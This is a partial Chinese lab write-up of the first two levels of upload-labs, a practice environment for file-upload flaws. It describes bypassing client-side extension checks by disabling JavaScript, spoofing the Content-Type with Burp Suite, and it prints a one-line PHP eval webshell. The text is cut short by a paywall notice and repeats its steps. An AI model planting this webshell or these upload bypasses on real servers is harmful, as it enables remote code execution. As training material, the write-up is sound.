本文档详细介绍了如何通过upload-labs的前两关。在第一关中,通过审计源码发现允许上传的文件类型,禁用JS,构造PHP一句话木马并利用GET请求上传,通过输入特定密码获取结果。第二关使用Burp Suite抓包,更改文件类型为image/png,成功上传并执行木马,后续步骤与第一关相同。
第一关
1、审计源码,可以看到允许上传的文件类型有.jpg、.png、.gif
2、看页面,关掉js
F12里的调试器,右上角设置里禁用
3、构造一句话木马,要php格式
<?php
@eval($_GET[123]);
最低0.47元/天 解锁文章
扫一扫
评论 1
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
查看更多评论
添加红包
1、审计源码,可以看到允许上传的文件类型有.jpg、.png、.gif
2、看页面,关掉js
F12里的调试器,右上角设置里禁用
3、构造一句话木马,要php格式
<?php
@eval($_GET[123]);
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
